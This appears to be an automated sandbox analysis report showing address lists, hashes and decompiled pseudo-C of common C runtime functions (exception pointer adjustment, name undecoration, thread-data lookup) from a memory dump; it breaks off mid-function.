0x6e1b3866
0x6e1b3869
0x00000000
0x00000000
0x6e1b3872
0x6e1b3875
0x6e1b387a
0x6e1b36f5
0x00000000
0x6e1b36f5
0x6e1b3797
0x6e1b379a
0x6e1b381a
0x6e1b381d
0x6e1b381e
0x6e1b3820
0x6e1b3832
0x6e1b3839
0x6e1b3822
0x6e1b3822
0x6e1b3829
0x6e1b3829
0x6e1b3840
0x6e1b3845
0x6e1b384b
0x6e1b384b
0x6e1b3731
0x6e1b3734
0x6e1b373f
0x6e1b3745
0x6e1b374b
0x6e1b374f
0x6e1b3750
0x6e1b3753
0x00000000
0x6e1b3758
0x6e1b379c
0x6e1b379c
0x6e1b379e
0x00000000
0x00000000
0x6e1b37a0
0x6e1b37a0
0x6e1b37a3
0x6e1b3805
0x6e1b3808
0x6e1b380d
0x6e1b36f4
0x00000000
0x6e1b36f4
0x6e1b37a5
0x6e1b37a5
0x6e1b37a8
0x6e1b37ef
0x6e1b37f2
0x6e1b37f7
0x00000000
0x6e1b37f7
0x6e1b37aa
0x6e1b37aa
0x6e1b37ad
0x6e1b37bd
0x6e1b37c0
0x6e1b37c4
0x6e1b37d1
0x6e1b37df
0x00000000
0x6e1b37e4
0x6e1b37af
0x6e1b37b2
0x00000000
0x00000000
0x00000000
0x6e1b37b8
0x6e1b3764
0x6e1b3766
0x00000000
0x00000000
0x00000000
0x6e1b3766
0x6e1b36de
0x6e1b36e1
0x6e1b36e4
0x6e1b372f
0x6e1b372f
0x00000000
0x6e1b372f
0x6e1b36e9
0x6e1b36fe
0x6e1b3701
0x6e1b3702
0x6e1b3704
0x6e1b3716
0x6e1b371d
0x6e1b3706
0x6e1b3706
0x6e1b370d
0x6e1b370d
0x6e1b3724
0x6e1b3729
0x00000000
0x6e1b3729
0x6e1b36ef
0x00000000

APIs

shared_ptr.LIBCMT ref: 6E1B3724
operator+.LIBVCRUNTIME ref: 6E1B3774
shared_ptr.LIBCMT ref: 6E1B3840
operator+.LIBVCRUNTIME ref: 6E1B38C6

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: operator+shared_ptr
String ID:
API String ID: 864562889-0
Opcode ID: ef99ad49fa8bee383e9fe3c9b6d1f42df889658a1bf879ab4c45d91ee64bb7b2
Instruction ID: 5d77a3e9c1cf75fb3c78e6ce3cec954cb6c3f4d8c94e5cde67965835e1aab9e7
Opcode Fuzzy Hash: ef99ad49fa8bee383e9fe3c9b6d1f42df889658a1bf879ab4c45d91ee64bb7b2
Instruction Fuzzy Hash: 156192B480420AEFDF01CFE8C558AED7BB9FB16304F108569E4259B210E7B296D6EF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE328, Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E1AE328(void* __eflags, void* __fp0) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t74;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t96;
				signed int* _t97;
				signed char* _t99;
				signed int _t104;
				void* _t108;
				void* _t129;

				_t129 = __fp0;
				E6E1AA7D0(0x6e216948, 0x10);
				_t74 = 0;
				_t52 =  *(_t108 + 0x10);
				_t80 = _t52[1];
				if(_t80 == 0 ||  *((intOrPtr*)(_t80 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t96 = _t52[2];
					if(_t96 != 0 ||  *_t52 < 0) {
						_t83 =  *_t52;
						_t104 =  *(_t108 + 0xc);
						if(_t83 >= 0) {
							_t104 = _t104 + 0xc + _t96;
						}
						 *(_t108 - 4) = _t74;
						_t99 =  *(_t108 + 0x14);
						if(_t83 >= 0 || ( *_t99 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t108 + 8));
							__eflags = _t83 & 0x00000008;
							if((_t83 & 0x00000008) == 0) {
								__eflags =  *_t99 & 0x00000001;
								if(( *_t99 & 0x00000001) == 0) {
									_t83 =  *(_t54 + 0x18);
									__eflags = _t99[0x18] - _t74;
									if(_t99[0x18] != _t74) {
										__eflags = _t83;
										if(_t83 == 0) {
											goto L32;
										} else {
											__eflags = _t104;
											if(_t104 == 0) {
												goto L32;
											} else {
												__eflags =  *_t99 & 0x00000004;
												_t78 = 0;
												_t74 = (_t78 & 0xffffff00 | ( *_t99 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t74;
												 *(_t108 - 0x20) = _t74;
												goto L29;
											}
										}
									} else {
										__eflags = _t83;
										if(_t83 == 0) {
											goto L32;
										} else {
											__eflags = _t104;
											if(_t104 == 0) {
												goto L32;
											} else {
												E6E1AAE00(_t104, E6E1ADC64(_t83,  &(_t99[8])), _t99[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t104;
										if(_t104 == 0) {
											goto L32;
										} else {
											E6E1AAE00(_t104,  *(_t54 + 0x18), _t99[0x14]);
											__eflags = _t99[0x14] - 4;
											if(_t99[0x14] == 4) {
												__eflags =  *_t104;
												if( *_t104 != 0) {
													_push( &(_t99[8]));
													_push( *_t104);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t83 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6e221b10; // 0x0
							 *((intOrPtr*)(_t108 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6e1ee1b4();
								_t83 =  *((intOrPtr*)(_t108 - 0x1c))();
								L12:
								if(_t83 == 0 || _t104 == 0) {
									L32:
									E6E1C4D58(_t74, _t83, _t96, _t99, _t104, _t129);
									asm("int3");
									E6E1AA7D0(0x6e216968, 8);
									_t97 =  *(_t108 + 0x10);
									_t84 =  *(_t108 + 0xc);
									__eflags =  *_t97;
									if(__eflags >= 0) {
										_t101 = _t84 + 0xc + _t97[2];
										__eflags = _t84 + 0xc + _t97[2];
									} else {
										_t101 = _t84;
									}
									 *(_t108 - 4) =  *(_t108 - 4) & 0x00000000;
									_t105 =  *(_t108 + 0x14);
									_push( *(_t108 + 0x14));
									_push(_t97);
									_push(_t84);
									_t76 =  *((intOrPtr*)(_t108 + 8));
									_push( *((intOrPtr*)(_t108 + 8)));
									_t58 = E6E1AE328(__eflags, _t129) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6E1AF126(_t101, _t105[0x18], E6E1ADC64( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6E1AF136(_t101, _t105[0x18], E6E1ADC64( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])), 1);
										}
									}
									 *(_t108 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t61;
								} else {
									 *_t104 = _t83;
									_push( &(_t99[8]));
									_push(_t83);
									L21:
									 *_t104 = E6E1ADC64();
									L29:
									 *(_t108 - 4) = 0xfffffffe;
									_t53 = _t74;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6e1ae328
0x6e1ae32f
0x6e1ae334
0x6e1ae336
0x6e1ae339
0x6e1ae33e
0x6e1ae44e
0x6e1ae44e
0x6e1ae44e
0x00000000
0x6e1ae34d
0x6e1ae34d
0x6e1ae352
0x6e1ae35c
0x6e1ae35e
0x6e1ae363
0x6e1ae368
0x6e1ae368
0x6e1ae36a
0x6e1ae36d
0x6e1ae372
0x6e1ae394
0x6e1ae394
0x6e1ae397
0x6e1ae39a
0x6e1ae3b8
0x6e1ae3bb
0x6e1ae3fa
0x6e1ae3fd
0x6e1ae400
0x6e1ae425
0x6e1ae427
0x00000000
0x6e1ae429
0x6e1ae429
0x6e1ae42b
0x00000000
0x6e1ae42d
0x6e1ae42d
0x6e1ae432
0x6e1ae436
0x6e1ae436
0x6e1ae437
0x00000000
0x6e1ae437
0x6e1ae42b
0x6e1ae402
0x6e1ae402
0x6e1ae404
0x00000000
0x6e1ae406
0x6e1ae406
0x6e1ae408
0x00000000
0x6e1ae40a
0x6e1ae41b
0x00000000
0x6e1ae420
0x6e1ae408
0x6e1ae404
0x6e1ae3bd
0x6e1ae3bd
0x6e1ae3c1
0x00000000
0x6e1ae3c7
0x6e1ae3c7
0x6e1ae3c9
0x00000000
0x6e1ae3cf
0x6e1ae3d6
0x6e1ae3de
0x6e1ae3e2
0x6e1ae3e4
0x6e1ae3e7
0x6e1ae3ec
0x6e1ae3ed
0x00000000
0x6e1ae3ed
0x6e1ae3e7
0x00000000
0x6e1ae3e2
0x6e1ae3c9
0x6e1ae3c1
0x6e1ae39c
0x6e1ae39c
0x00000000
0x6e1ae39c
0x6e1ae379
0x6e1ae379
0x6e1ae37e
0x6e1ae383
0x00000000
0x6e1ae385
0x6e1ae387
0x6e1ae390
0x6e1ae39f
0x6e1ae3a1
0x6e1ae460
0x6e1ae460
0x6e1ae465
0x6e1ae46d
0x6e1ae472
0x6e1ae475
0x6e1ae478
0x6e1ae47b
0x6e1ae484
0x6e1ae484
0x6e1ae47d
0x6e1ae47d
0x6e1ae47d
0x6e1ae487
0x6e1ae48b
0x6e1ae48e
0x6e1ae48f
0x6e1ae490
0x6e1ae491
0x6e1ae494
0x6e1ae49d
0x6e1ae49d
0x6e1ae4a0
0x6e1ae4d6
0x6e1ae4a2
0x6e1ae4a2
0x6e1ae4a2
0x6e1ae4a5
0x6e1ae4bc
0x6e1ae4bc
0x6e1ae4a5
0x6e1ae4db
0x6e1ae4e5
0x6e1ae4f1
0x6e1ae3af
0x6e1ae3af
0x6e1ae3b4
0x6e1ae3b5
0x6e1ae3ef
0x6e1ae3f6
0x6e1ae43a
0x6e1ae43a
0x6e1ae441
0x6e1ae450
0x6e1ae453
0x6e1ae45f
0x6e1ae45f
0x6e1ae3a1
0x6e1ae383
0x00000000
0x00000000
0x00000000
0x6e1ae352

APIs

___AdjustPointer.LIBCMT ref: 6E1AE3EF
___AdjustPointer.LIBCMT ref: 6E1AE412
___AdjustPointer.LIBCMT ref: 6E1AE4AE

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b65c9aa54bea4163e9c5fa3b61d7ab9feea55dc3eced9fc10e74ef9ffd344cb8
Instruction ID: 0b2a9a686f1fb6c5a4e67a9e9092c2b1fa6206263c695a69cb397a084fe742c1
Opcode Fuzzy Hash: b65c9aa54bea4163e9c5fa3b61d7ab9feea55dc3eced9fc10e74ef9ffd344cb8
Instruction Fuzzy Hash: BE51B37A604606DFDB15CF98C950BBA77B9EF14314F20482DEE118B290E731EAC0EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B272F, Relevance: 6.1, APIs: 4, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B272F(signed int* _a4, intOrPtr* _a8, char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t46;
				intOrPtr _t47;
				signed int* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t57;
				char* _t60;
				char* _t62;
				signed int* _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				signed int _t80;
				intOrPtr _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t87 =  *0x6e221b68; // 0x0
				_t88 = _t87 + 1;
				 *0x6e221b68 = _t88;
				_t74 =  *_t88;
				_t94 = 0;
				_t70 = _t74;
				_v12 = 0;
				_t91 = 0;
				_v8 = 0;
				_t46 = _t70 - 0x41;
				if(_t46 == 0) {
					if(_a16 != 0) {
						L32:
						_t42 = _t88 + 1; // 0x1
						_t47 = _t42;
						L33:
						 *0x6e221b68 = _t47;
						_t48 = _a4;
						_t48[1] = _t94;
						L34:
						 *_t48 = _t94;
						L35:
						return _t48;
					}
					_t49 = _a8;
					if( *_t49 == 2 ||  *_t49 == 3) {
						 *_t49 = 5;
						goto L31;
					} else {
						if( *_t49 != 1) {
							goto L32;
						}
						 *_t49 = 4;
						L31:
						_t88 =  *0x6e221b68; // 0x0
						goto L32;
					}
				}
				_t50 = _t46 - 1;
				if(_t50 == 0) {
					if(_a16 == 0) {
						 *_a12 = 1;
						E6E1B0C7F( &_v12, 0x3e);
						L24:
						_t53 =  *0x6e221b68; // 0x0
						_t47 = _t53 + 1;
						goto L33;
					}
					L22:
					_t48 = _a4;
					_t48[1] = _t94;
					_t48[1] = 2;
					goto L34;
				}
				if(_t50 == 1) {
					 *_a8 = 5;
					goto L24;
				}
				if(_t74 == 0) {
					L19:
					E6E1AF804(_a4, 1);
					_t48 = _a4;
					goto L35;
				}
				_t57 =  *((intOrPtr*)(_t88 + 1));
				if(_t57 == 0) {
					goto L19;
				}
				if(_a16 != 0) {
					goto L22;
				}
				_t5 = _t70 - 0x30; // -48
				_t6 = _t88 + 2; // 0x3
				 *0x6e221b68 = _t6;
				_t73 = _t57 + 0xffffffd0 + (_t5 << 4);
				if(_t57 + 0xffffffd0 + (_t5 << 4) > 1) {
					E6E1B0C7F( &_v12, 0x2c);
					_t69 = E6E1AFB8D( &_v12,  &_v28, E6E1AF8D0(_t73,  &_v20, 0, 0, _t73, 0));
					_t94 =  *_t69;
					_t91 = _t69[1];
				}
				_v20 = _t94;
				_v16 = _t91;
				E6E1AFCDE( &_v20, 0x3e);
				_t60 =  *0x6e221b68; // 0x0
				_t89 = _v20;
				_t80 = _v16;
				_v12 = _t89;
				_v8 = _t80;
				if( *_t60 != 0x24) {
					_v16 = _t80;
					_v20 = _t89;
					E6E1AFCDE( &_v20, 0x5e);
					_t89 = _v20;
					_t80 = _v16;
					_t62 =  *0x6e221b68; // 0x0
					_v12 = _t89;
					_v8 = _t80;
				} else {
					_t62 = _t60 + 1;
					 *0x6e221b68 = _t62;
				}
				if( *_t62 == 0) {
					if(_t80 <= 1) {
						if(_t89 == 0) {
							E6E1AFA80( &_v12, 1);
						} else {
							E6E1AF5B8( &_v12, 0x6e1f36e4);
						}
						_t89 = _v12;
						_t80 = _v8;
					}
				} else {
					 *0x6e221b68 = _t62 + 1;
				}
				_t48 = _a4;
				 *_t48 = _t89;
				_t48[1] = _t80 | 0x00004000;
				goto L35;
			}

0x6e1b2735
0x6e1b273b
0x6e1b273d
0x6e1b2744
0x6e1b2746
0x6e1b2748
0x6e1b274e
0x6e1b2751
0x6e1b2753
0x6e1b2756
0x6e1b2759
0x6e1b28a5
0x6e1b28cd
0x6e1b28cd
0x6e1b28cd
0x6e1b28d0
0x6e1b28d0
0x6e1b28d5
0x6e1b28d8
0x6e1b28db
0x6e1b28db
0x6e1b28dd
0x6e1b28e1
0x6e1b28e1
0x6e1b28a7
0x6e1b28ad
0x6e1b28c1
0x00000000
0x6e1b28b4
0x6e1b28b7
0x00000000
0x00000000
0x6e1b28b9
0x6e1b28c7
0x6e1b28c7
0x00000000
0x6e1b28c7
0x6e1b28ad
0x6e1b275f
0x6e1b2762
0x6e1b287c
0x6e1b2892
0x6e1b2895
0x6e1b289a
0x6e1b289a
0x6e1b289f
0x00000000
0x6e1b289f
0x6e1b287e
0x6e1b287e
0x6e1b2881
0x6e1b2884
0x00000000
0x6e1b2884
0x6e1b276b
0x6e1b2871
0x00000000
0x6e1b2871
0x6e1b2773
0x6e1b285f
0x6e1b2864
0x6e1b2869
0x00000000
0x6e1b2869
0x6e1b2779
0x6e1b277e
0x00000000
0x00000000
0x6e1b2787
0x00000000
0x00000000
0x6e1b278d
0x6e1b2796
0x6e1b279c
0x6e1b27a1
0x6e1b27a6
0x6e1b27ad
0x6e1b27c4
0x6e1b27c9
0x6e1b27cb
0x6e1b27cb
0x6e1b27d3
0x6e1b27d6
0x6e1b27d9
0x6e1b27de
0x6e1b27e3
0x6e1b27e6
0x6e1b27e9
0x6e1b27ef
0x6e1b27f2
0x6e1b27fc
0x6e1b2804
0x6e1b2807
0x6e1b280c
0x6e1b280f
0x6e1b2812
0x6e1b2817
0x6e1b281a
0x6e1b27f4
0x6e1b27f4
0x6e1b27f5
0x6e1b27f5
0x6e1b2820
0x6e1b282d
0x6e1b2834
0x6e1b2844
0x6e1b2836
0x6e1b283b
0x6e1b283b
0x6e1b2849
0x6e1b284c
0x6e1b284c
0x6e1b2822
0x6e1b2823
0x6e1b2823
0x6e1b284f
0x6e1b2858
0x6e1b285a
0x00000000

APIs

DName::DName.LIBVCRUNTIME ref: 6E1B27B7

Part of subcall function 6E1AF8D0: __aulldvrm.LIBCMT ref: 6E1AF901

DName::operator+.LIBCMT ref: 6E1B27C4
DName::operator=.LIBVCRUNTIME ref: 6E1B2844
DName::DName.LIBVCRUNTIME ref: 6E1B2864

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 405d18c4687ab074e145c7635f63c193ae4b0faa16b951c95e1393b29e359a14
Instruction ID: bcf8aa55dabdf6de22bc9ea9949cc11df3c9dab4b3439ab89d9bffaca506f3bb
Opcode Fuzzy Hash: 405d18c4687ab074e145c7635f63c193ae4b0faa16b951c95e1393b29e359a14
Instruction Fuzzy Hash: CE517C74900259DFDB05CFD8C990AADBBF5FB2A300F21809AD5215B294D7719AC9DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF749, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1CF749(void* __ecx, void* __edx, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;
				void* _t72;

				_t72 = __fp0;
				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6e218190; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E1D461A(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6E1D16BE(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6E1D461A(__eflags,  *0x6e218190, _t51);
							if(__eflags != 0) {
								E6E1CF3E7(_t51, 0x6e222078);
								E6E1D1BE4(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6E1D461A(__eflags,  *0x6e218190, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6E1D461A(0,  *0x6e218190, 0);
							_push(0);
							L9:
							E6E1D1BE4();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6E1D45DB(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6e218190; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6E1C4D58(_t39, _t43, _t49, _t53, _t60, _t72);
					asm("int3");
					_t5 =  *0x6e218190; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6E1D461A(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6E1D16BE(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6E1D461A(__eflags,  *0x6e218190, _t60);
								if(__eflags != 0) {
									E6E1CF3E7(_t60, 0x6e222078);
									E6E1D1BE4(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6E1D461A(__eflags,  *0x6e218190, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6E1D461A(__eflags,  *0x6e218190, _t20);
								_push(_t60);
								L25:
								E6E1D1BE4();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6E1D45DB(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6e218190; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6E1C4D58(_t39, _t43, _t49, _t53, _t60, _t72);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6e218190; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6E1D461A(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6E1D16BE(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6E1D461A(__eflags,  *0x6e218190, _t54);
											if(__eflags != 0) {
												E6E1CF3E7(_t54, 0x6e222078);
												E6E1D1BE4(0);
												goto L45;
											} else {
												_t40 = 0;
												E6E1D461A(__eflags,  *0x6e218190, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6E1D461A(0,  *0x6e218190, 0);
											_push(0);
											L41:
											E6E1D1BE4();
											goto L36;
										}
									}
								} else {
									_t54 = E6E1D45DB(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6e218190; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6e1cf749
0x6e1cf749
0x6e1cf749
0x6e1cf754
0x6e1cf756
0x6e1cf75b
0x6e1cf75e
0x6e1cf77c
0x6e1cf77f
0x6e1cf784
0x6e1cf786
0x00000000
0x6e1cf788
0x6e1cf794
0x6e1cf797
0x6e1cf798
0x6e1cf79a
0x6e1cf7bf
0x6e1cf7c1
0x6e1cf7da
0x6e1cf7e1
0x6e1cf7e6
0x00000000
0x6e1cf7c3
0x6e1cf7c3
0x6e1cf7cc
0x6e1cf7d1
0x00000000
0x6e1cf7d1
0x6e1cf79c
0x6e1cf79c
0x6e1cf79c
0x6e1cf7a5
0x6e1cf7aa
0x6e1cf7ab
0x6e1cf7ab
0x6e1cf7b0
0x00000000
0x6e1cf7b0
0x6e1cf79a
0x6e1cf760
0x6e1cf766
0x6e1cf76a
0x6e1cf777
0x00000000
0x6e1cf76c
0x6e1cf76f
0x6e1cf7e9
0x6e1cf7e9
0x6e1cf771
0x6e1cf771
0x6e1cf771
0x6e1cf773
0x6e1cf773
0x6e1cf773
0x6e1cf76f
0x6e1cf76a
0x6e1cf7ec
0x6e1cf7f4
0x6e1cf7f6
0x6e1cf7f8
0x6e1cf800
0x6e1cf805
0x6e1cf806
0x6e1cf80b
0x6e1cf80c
0x6e1cf80f
0x6e1cf829
0x6e1cf82c
0x6e1cf831
0x6e1cf833
0x00000000
0x6e1cf835
0x6e1cf841
0x6e1cf844
0x6e1cf845
0x6e1cf847
0x6e1cf86a
0x6e1cf86c
0x6e1cf883
0x6e1cf88a
0x6e1cf88f
0x00000000
0x6e1cf86e
0x6e1cf875
0x6e1cf87a
0x00000000
0x6e1cf87a
0x6e1cf849
0x6e1cf850
0x6e1cf855
0x6e1cf856
0x6e1cf856
0x6e1cf85b
0x00000000
0x6e1cf85b
0x6e1cf847
0x6e1cf811
0x6e1cf817
0x6e1cf819
0x6e1cf81b
0x6e1cf824
0x00000000
0x6e1cf81d
0x6e1cf81d
0x6e1cf820
0x6e1cf89a
0x6e1cf89a
0x6e1cf89f
0x6e1cf8a2
0x6e1cf8a3
0x6e1cf8a4
0x6e1cf8ab
0x6e1cf8ad
0x6e1cf8b2
0x6e1cf8b5
0x6e1cf8d3
0x6e1cf8d6
0x6e1cf8db
0x6e1cf8dd
0x00000000
0x6e1cf8df
0x6e1cf8eb
0x6e1cf8ef
0x6e1cf8f1
0x6e1cf916
0x6e1cf918
0x6e1cf931
0x6e1cf938
0x00000000
0x6e1cf91a
0x6e1cf91a
0x6e1cf923
0x6e1cf928
0x00000000
0x6e1cf928
0x6e1cf8f3
0x6e1cf8f3
0x6e1cf8f3
0x6e1cf8fc
0x6e1cf901
0x6e1cf902
0x6e1cf902
0x00000000
0x6e1cf907
0x6e1cf8f1
0x6e1cf8b7
0x6e1cf8bd
0x6e1cf8bf
0x6e1cf8c1
0x6e1cf8ce
0x00000000
0x6e1cf8c3
0x6e1cf8c3
0x6e1cf8c6
0x6e1cf940
0x6e1cf940
0x6e1cf8c8
0x6e1cf8c8
0x6e1cf8c8
0x6e1cf8c8
0x6e1cf8ca
0x6e1cf8ca
0x6e1cf8ca
0x6e1cf8c6
0x6e1cf8c1
0x6e1cf943
0x6e1cf94b
0x6e1cf94d
0x6e1cf94d
0x6e1cf954
0x6e1cf822
0x6e1cf892
0x6e1cf892
0x6e1cf894
0x00000000
0x6e1cf896
0x6e1cf899
0x6e1cf899
0x6e1cf894
0x6e1cf820
0x6e1cf81b
0x6e1cf7fa
0x6e1cf7ff
0x6e1cf7ff

APIs

GetLastError.KERNEL32(00000008,?,00000000,6E1D8773,6E1913C8,6E191439,?,6E191225,00000000,00000000), ref: 6E1CF74E
_free.LIBCMT ref: 6E1CF7AB
_free.LIBCMT ref: 6E1CF7E1
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6E191225,00000000,00000000), ref: 6E1CF7EC

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: da4aef9760bbcde85bdb625f36183fea5e9486cae36ebfb2dfebe7fbbbb13022
Instruction ID: 12a7eee53643361033cab14ec1fad328ea87e105dae03532860ea1aac3c101af
Opcode Fuzzy Hash: da4aef9760bbcde85bdb625f36183fea5e9486cae36ebfb2dfebe7fbbbb13022
Instruction Fuzzy Hash: 09110A33214A012F9A415FF84CC4DAA25AEABF6A797350625F334C25C0DF2588CAB122

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF8A0, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E1CF8A0(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
